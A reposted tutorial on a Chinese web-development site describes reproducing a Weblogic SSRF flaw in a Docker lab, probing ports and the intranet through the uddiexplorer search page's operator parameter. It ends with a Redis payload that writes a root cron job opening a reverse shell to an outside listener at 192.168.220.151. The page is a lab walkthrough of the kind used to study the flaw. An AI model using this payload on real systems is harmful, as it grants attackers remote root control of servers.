Home > Operation and Maintenance > Safety > How to Reproduce Weblogic SSRF Vulnerability

How to Reproduce Weblogic SSRF Vulnerability

王林
Release: 2023-05-14 20:04:04
forward
1436 people have browsed it

1. Use docker to build an environment

Docker installation and environment building tutorial: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Access port 7001如何实现Weblogic SSRF漏洞复现

2. Vulnerability reproduction steps

1. Vulnerability page/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2. Check IBM.

如何实现Weblogic SSRF漏洞复现

It is found that there is a connection, so there may be ssrf.

3. Use burp suite to capture packets. Click Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4. Modify the connection of operator parameters

如何实现Weblogic SSRF漏洞复现

##5. Access result

Accessing a non-existing port returns could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

Accessing an existing port returns a status code

如何实现Weblogic SSRF漏洞复现

Access the intranet

如何实现Weblogic SSRF漏洞复现

Use redis to rebound the shell payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
Copy after login

The above is the detailed content of How to Reproduce Weblogic SSRF Vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:yisu.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template